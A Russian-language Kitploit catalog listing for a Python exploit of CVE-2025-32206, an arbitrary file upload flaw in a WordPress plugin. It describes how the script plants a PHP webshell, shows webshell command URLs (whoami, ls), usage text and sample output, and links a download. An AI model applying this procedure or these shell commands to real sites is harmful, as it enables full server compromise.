Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-32206 — WordPress Processing Projects Plugin <= 1.0.2 уязвим для произвольной загрузки файлов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-32206
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийТестирование на Проникновение
GitHubnxploited/cve-2025-32206

CVE-2025-32206

WordPress Processing Projects Plugin <= 1.0.2 уязвим для произвольной загрузки файлов

Репозиторий
211 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-32206 - Эксплойт произвольной загрузки файлов в WordPress Processing Projects <= 1.0.2

CVE-2025-32206 Banner


🔍 Информация о CVE

  • ID CVE: CVE-2025-32206
  • Тип уязвимости: Неограниченная загрузка файлов (загрузка веб-шелла)
  • Затронутый плагин: WordPress-плагин Processing Projects
  • Затронутые версии: От неизвестной (н/д) до 1.0.2
  • Оценка CVSS: 9.1 (КРИТИЧЕСКАЯ)
  • Вектор: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

«Уязвимость неограниченной загрузки файлов опасного типа в LABCAT Processing Projects позволяет злоумышленникам загружать веб-шелл на веб-сервер. Это может привести к полной компрометации системы.»


🧑‍💻 Описание эксплойта

Этот эксплойт на Python нацелен на сайты WordPress, использующие уязвимый плагин Processing Projects (версия <= 1.0.2). Плагин некорректно обрабатывает загрузку файлов от аутентифицированных пользователей, позволяя им загружать произвольные ZIP-файлы, содержащие исполняемый PHP-код (веб-шеллы).

Скрипт эксплойта:

  1. Выполняет аутентификацию на целевом сайте WordPress в качестве администратора.
  2. Переходит к уязвимой конечной точке и автоматически извлекает поля nonce.
  3. Создаёт ZIP-файл (Nxploited.zip), содержащий вредоносный PHP-шелл (Nxploit.php).
  4. Загружает файл через POST-запрос, имитирующий поведение администратора WordPress.
  5. Проверяет доступность шелла по адресу:
    • http://target.com/wp-content/uploads/processing-projects/Nxploit.php

🐚 Использование шелла

После успешной загрузки шелла его можно использовать для выполнения системных команд через параметр cmd. Примеры:

root@kitploit:~
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=whoami
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=ls

Этот шелл выполняет произвольные команды ОС и возвращает их вывод непосредственно в ответе.


🚀 Использование

root@kitploit:~
usage: CVE-2025-32206.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit for CVE-2025-32206 | By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g. http://target.com/wordpress)
  -un, --username USERNAME     WordPress admin username
  -p, --password PASSWORD      WordPress admin password

📄 Пример вывода

root@kitploit:~

[+] CVE-2025-32206 | WordPress Processing Projects <= 1.0.2 - Arbitrary File Upload
[+] By Nxploited | Khaled Alenazi

[+] Created zip with shell: Nxploited.zip -> Nxploit.php
[+] Logged in successfully.
[+] Extracted form fields successfully.
[+] Upload request sent successfully.
[+] Shell executed at: http://target.com/wp-content/uploads/processing-projects/Nxploit.php

⚠️ Отказ от ответственности

Этот скрипт предоставляется только в образовательных целях. Несанкционированное использование этого эксплойта на системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным и неэтичным.

Всегда следуйте практике ответственного раскрытия уязвимостей и используйте этот инструмент только в контролируемых средах или при наличии явного разрешения.


Автор: Nxploited | Khaled Alenazi

Скачать инструмент